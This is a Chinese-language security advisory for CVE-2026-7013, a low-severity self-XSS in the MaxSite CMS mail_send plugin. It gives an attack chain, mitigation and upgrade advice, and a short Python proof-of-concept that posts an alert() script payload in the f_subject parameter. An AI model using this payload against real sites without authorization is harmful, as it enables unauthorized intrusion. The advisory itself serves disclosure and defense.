IPBUF安全漏洞报告
English
CVE-2026-7013 CVSS 2.4 低危

CVE-2026-7013 MaxSite CMS mail_send插件跨站脚本漏洞

披露日期: 2026-04-26

漏洞信息

漏洞编号
CVE-2026-7013
漏洞类型
跨站脚本 (XSS)
CVSS评分
2.4 低危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
需要交互 (UI:R)
影响产品
MaxSite CMS

相关标签

XSSCross Site ScriptingMaxSite CMSSelf-XSSCWE-79mail_send

漏洞概述

MaxSite CMS 109.3 及之前版本中的 mail_send 插件存在安全漏洞。由于未对 f_subject、f_files 和 f_from 参数进行充分的过滤,攻击者可操纵这些参数触发跨站脚本攻击。尽管厂商将其归类为 Self-XSS,但这仍属于安全编码标准的违规。目前已公开披露利用代码,建议用户尽快升级至 109.4 版本以修复此问题。

技术细节

该漏洞存在于 MaxSite CMS 的 mail_send 插件组件中。问题的根源在于应用程序在处理邮件发送功能时,未能对用户提交的 f_subject(主题)、f_files(附件)和 f_from(发件人)参数进行严格的输出编码。具体来说,代码缺少对 `htmlspecialchars()` 函数的调用,导致攻击者可以将恶意的 JavaScript 或 HTML 代码注入到这些参数中。当具有高权限的用户(如管理员)查看受影响的数据时,注入的脚本将在浏览器上下文中执行。尽管 CVSS 评分较低(需要高权限和用户交互),但在特定场景下,这可被用来窃取敏感信息或执行未授权操作。补丁 8a3946bd0a54bfb72a4d57179fcd253f2c550cd7 已通过添加过滤机制修复了此问题。

攻击链分析

STEP 1
步骤1
攻击者获取目标 MaxSite CMS 的高权限账户访问权限(或诱导管理员执行操作)。
STEP 2
步骤2
攻击者访问 mail_send 插件功能,并在 f_subject、f_files 或 f_from 参数中注入恶意 XSS Payload。
STEP 3
步骤3
系统存储或处理该未经过滤的数据。
STEP 4
步骤4
管理员或其他高权限用户查看包含该数据的页面。
STEP 5
步骤5
浏览器解析恶意脚本并执行,导致 XSS 攻击成功。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example) target_url = "http://target.com/maxsite/index.php/mail_send" # Malicious payload to test XSS xss_payload = "<script>alert('CVE-2026-7013');</script>" # Vulnerable parameters based on the description # Note: This requires High Privileges (Admin) and User Interaction data = { "f_subject": xss_payload, "f_files": "test_file.txt", "f_from": "[email protected]" } # Send POST request # Session cookies might be required to simulate the high privilege user response = requests.post(target_url, data=data) if response.status_code == 200: print("Payload sent successfully.") print("Check the page where the subject is displayed to see if the alert triggers.") else: print(f"Request failed with status code: {response.status_code}")

影响范围

MaxSite CMS <= 109.3

防御指南

临时缓解措施
如果无法立即升级,建议限制对 mail_send 插件的访问权限,仅允许可信人员使用。同时,应在服务器端对所有用户输入(特别是 f_subject、f_files 和 f_from 参数)实施严格的输入验证和输出编码,确保使用 `htmlspecialchars()` 等函数转义特殊字符,防止脚本注入。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表